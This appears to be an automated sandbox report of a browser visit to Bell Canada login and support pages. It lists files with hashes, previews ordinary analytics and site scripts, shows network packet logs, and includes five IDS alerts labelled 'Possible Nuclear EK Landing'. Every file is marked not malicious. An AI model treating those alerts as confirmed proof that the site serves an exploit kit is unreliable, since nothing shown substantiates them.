                                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>..<html id="shop" lang="en" class=" js flexbox " style="">....<head class="at-element-marker">.. <title>Sorry, something went wrong while loading.the.page./Le chargement de la page s.est malheureusement interrompu.</title>.. <script src="https://assets.adobedtm.com/92c238f848e3/0fc93359920c/launch-26891e3701a2.min.js" async></script>.... <meta charset="utf-8">.... <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.. <meta http-equiv="Content-Type" content="text/html;charset=utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">.... <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.. New line added for Youtube Video link 24/03/2017 -->.... <meta name="ROBOTS" content="NOINDEX">.. <link href="/foassets/bell.css" rel="stylesheet">......</head>....<body class="rsx-bg-white" style="">.. <main id="maincontent" class="rsx-page-content rsx-bg-white ">.. <div class="
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (423)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):570
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.322641239846057
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBSx5YpIct/BeTrAApBSx5YpBLWidGTEX+DRWx3SCurKmwOgp3irUk+L:zlixsIct/BMlixsYidG4XGRWxlurKr3X
                                                                                                                                                                                                                                                                                                                                      MD5:2709C8C13D27186FEA620DF8EF509DDD
                                                                                                                                                                                                                                                                                                                                      SHA1:1F7527969B4252D33912FB7E37A0903EE6414E24
                                                                                                                                                                                                                                                                                                                                      SHA-256:BCD05B317F116F080E8AD56264E3D0F841E28E1E5574D3851573321A1AB99CC1
                                                                                                                                                                                                                                                                                                                                      SHA-512:6103AC3B986875C9FE64E5E75FD757398F06F0362E92C2F39AB0F8382B8AC2CD44E6E1ACD57C73F49578365CDEDF7E01EC00C3FEA2BB769559B1540AEF3E0D5B
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0d8b1f5e842b42a98045e57cb835d073-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0d8b1f5e842b42a98045e57cb835d073-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0d8b1f5e842b42a98045e57cb835d073-source.min.js', "_linkedin_data_partner_id=\"37981\",function(){var t=document.getElementsByTagName(\"script\")[0],e=document.createElement(\"script\");e.type=\"text/javascript\",e.async=!0,e.src=\"https://snap.licdn.com/li.lms-analytics/insight.min.js\",t.parentNode.insertBefore(e,t)}();");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):8
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.5
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:x:x
                                                                                                                                                                                                                                                                                                                                      MD5:402E7A087747CB56C718BDE84651F96A
                                                                                                                                                                                                                                                                                                                                      SHA1:7CE01F6381463362CF6AEF2F843A59261E8F5587
                                                                                                                                                                                                                                                                                                                                      SHA-256:662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
                                                                                                                                                                                                                                                                                                                                      SHA-512:5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:Success!
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4766), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):4766
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.821767837150259
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUs9mIQt4kC:1DY0hf1bT47OIqWb199RQtw
                                                                                                                                                                                                                                                                                                                                      MD5:807163F0FD7836F80511DDEC9CA73993
                                                                                                                                                                                                                                                                                                                                      SHA1:858CA2949EDBE70D277D7856336840E5D067A238
                                                                                                                                                                                                                                                                                                                                      SHA-256:3AC459AFEA5102C6CA67EAF0F0156B0C68CB100D2BD5849545B86D18AA356354
                                                                                                                                                                                                                                                                                                                                      SHA-512:00C0E10CC4E9949739003848D9D91BEE411305DB51E8D0AA8DD3600005C48B769B0E358CB9FB4E04D7C245AAD671A8845E34E7815F8A299CD27CCF7DF5290546
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/953414520/?random=1730380345423&cv=11&fst=1730380345423&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (10205), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):10205
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3025574672083104
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:8/v+J6fD9oUCNSNDhDeDzcOOnZKhGzWZRjRPRgowJwDEA:tpNSNDhDeDzcydT
                                                                                                                                                                                                                                                                                                                                      MD5:549B71759D862483002C65F18EA757CF
                                                                                                                                                                                                                                                                                                                                      SHA1:FB078917FC2C1C6428FE66CFE3C52E7BF2840463
                                                                                                                                                                                                                                                                                                                                      SHA-256:7E8C6178F007F0A6F06F1D12BD3D3B74D01F7290B0BA4B94FD63ECCBE9C425D4
                                                                                                                                                                                                                                                                                                                                      SHA-512:C01D697937A1FE0719875AB88151B08C84C302420C2B749ACDC4CAE5477C739362F2631E7EFBFA6A538F7F41D261B715318309DF3C0F5429C300C7C285954CE9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca/static/bell_common.js?cache
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){(function(bk){"use strict";var K=Function.prototype.call.bind(Function.prototype.toString);var o=[];var x=[];var l={toString:function(){var a=o.lastIndexOf(this);if(a>=0){return x[a]}return K(this)}};l.toString.prototype=void 0;o=[l.toString];x=[K(Function.prototype.toString)];function z(a,c){if(typeof c!=="function"){return}try{var b=l.toString.call(c);x.push(b);o.push(a);if(Function.prototype.toString!==l.toString){Function.prototype.toString=l.toString}}catch(a){}}var C="ZT4tcOwEFkVEzfiT1T6u";var bh=Object.call.bind(Object.bind,Object.call);var bg=bh(Object.call);var bj=Array.prototype.push;var bi=Array.prototype.indexOf;var Y=Array.prototype.concat;var i=Array.prototype.slice;function A(){return{__callbacks:[],notify:function(g){var h;var d=bg(i,this.__callbacks);var a=d.length;for(var b=a-1;b>=0;--b){try{var e=d[b];if(e!=null){var c=e(g,h);if(c!=null){h=c}}}catch(a){}}return h},register:function(a){bg(bj,this.__callbacks,a)},unregister:function(b){var a=bg(bi,this.__ca
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.92586884922945
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRE8MyqXXl6EOd61CSHI:UrXiFqX1W8Ro
                                                                                                                                                                                                                                                                                                                                      MD5:48B934A103D0ACB13D3E761CBB404773
                                                                                                                                                                                                                                                                                                                                      SHA1:CC072E06AF9B99C4D00A7C64CB17F17CF5DB4D16
                                                                                                                                                                                                                                                                                                                                      SHA-256:02B9D804082DD878C0B2FB1F90C976EC47AD6D8D5257427F6BB0DAA48C337D2F
                                                                                                                                                                                                                                                                                                                                      SHA-512:D05D1CBF62F6AC1F564A5D8F2ACD77C70DDB87EDCFE64F150820B56F3D87CDCAF5E4D5BA611AC93105726CC85540D4CB8F8C16EA31115A65ABA6C4F7240C2D0C
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__9 === 'function' && branch_callback__9("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):62997
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.965747876259691
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:5tARnQmizGyXvvo9pTNcoG+Kq02HRfPSvvI9p6LcEzWpHyWariMMt9+iKcD:5qVQ26vvo9pPHSvvI9p68mcD
                                                                                                                                                                                                                                                                                                                                      MD5:5F820DF66D0D13394FB2D24779AC383E
                                                                                                                                                                                                                                                                                                                                      SHA1:ADCB4785EA7E0EAB221F97FCFFC2D581014A3FD7
                                                                                                                                                                                                                                                                                                                                      SHA-256:86AF890FA9024B03A39BB05165F0C577B0E4C7F9223CBDE78A66247DB2F82006
                                                                                                                                                                                                                                                                                                                                      SHA-512:F343E984E3EFE8512BAC62DBFF423848D6B6A1F65D5F1FF8BE7ACBC1C0BD3C050C139F87BE61C8F7753221469D8E7DCB907C55B9B7503CFD9268A409F0D2E993
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/Shared/css/support-top.css?v=oe3GKQ13fZrVpGIRuJOH9HiKgSJYwjnawIazf53Iul81
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(2474,32): run-time error CSS1046: Expect comma, found '0'..(2474,36): run-time error CSS1046: Expect comma, found '/'.. */../*START BELL ICON FONTS*/..@font-face{font-family:'bell-support';src:url(../fonts/support-home-phone-icons.eot?#iefix) format("embedded-opentype"),url(../fonts/support-home-phone-icons.woff2) format("woff2"),url(../fonts/support-home-phone-icons.svg) format("svg");font-weight:400;font-style:normal}..@font-face {.. font-family: 'bell-icon';.. src: url(../fonts/support-home-phone-icons.eot?#iefix) format("embedded-opentype"),url(../fonts/support-home-phone-icons.woff2) format("woff2"),url(../fonts/support-home-phone-icons.svg) format("svg");.. font-weight: 400;.. font-style: normal..}.....icon,.icon:before {.. font-family: 'bell-support';.. position: static..}.....icon-support{font-style:normal;speak:none;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoot
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREFYo1yqXXl6ECUP1CSHI:UrXimPwqX1/tRo
                                                                                                                                                                                                                                                                                                                                      MD5:58F945C9D418F06F89DAC38E33C9CB3F
                                                                                                                                                                                                                                                                                                                                      SHA1:86FB4BD2D9DF351F2F973395210795C2BCBFA2DD
                                                                                                                                                                                                                                                                                                                                      SHA-256:951B8330552312B27356D86FD8EDA74E67700F16E9D8BD754D08A2484564A1B9
                                                                                                                                                                                                                                                                                                                                      SHA-512:0B189A69DF18396A01D34D47CB8D7FB8D827C79C58664EAA11A56ACEA56813A45F074FB8FE133861959D71A378C71F1BB46B34D393251C6FA149B2DF6BD74CAD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__1 === 'function' && branch_callback__1("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      No static file info
                                                                                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                      2024-10-31T14:12:20.787841+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.95002687.248.119.252443TCP
                                                                                                                                                                                                                                                                                                                                      2024-10-31T14:12:23.152546+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.95005787.248.119.251443TCP
                                                                                                                                                                                                                                                                                                                                      2024-10-31T14:12:47.422706+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.950346142.250.185.174443TCP
                                                                                                                                                                                                                                                                                                                                      2024-10-31T14:13:10.734140+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.950651104.244.42.3443TCP
                                                                                                                                                                                                                                                                                                                                      2024-10-31T14:13:10.763044+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.950652172.66.0.227443TCP
                                                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:40.050780058 CET49677443192.168.2.920.189.173.11
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:40.660219908 CET49677443192.168.2.920.189.173.11
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:40.722678900 CET49673443192.168.2.9204.79.197.203
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:41.863347054 CET49677443192.168.2.920.189.173.11
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.316525936 CET49676443192.168.2.923.206.229.209
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.316641092 CET49675443192.168.2.923.206.229.209
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.425825119 CET49674443192.168.2.923.206.229.209
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.935523987 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.935589075 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.935710907 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.936084032 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:42.936126947 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:43.825443983 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:43.827452898 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:43.855773926 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:43.855792999 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:43.856076002 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:43.866347075 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:43.911324024 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.110323906 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.110349894 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.110366106 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.110411882 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.110424995 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.110493898 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.110493898 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.228172064 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.228199959 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.228290081 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.228315115 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.228357077 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.269565105 CET49677443192.168.2.920.189.173.11
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.345887899 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.345921040 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.345974922 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.345985889 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.346031904 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.346050024 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.463973999 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.464006901 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.464066982 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.464092016 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.464106083 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.464139938 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.581155062 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.581183910 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.581234932 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.581263065 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.581295013 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.581315994 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.698719025 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.698746920 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.698801994 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.698836088 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.698863983 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.698884964 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.816570044 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.816597939 CET4434970613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.816696882 CET49706443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:44.816728115 CET4434970613.107.246.45192.168.2.9
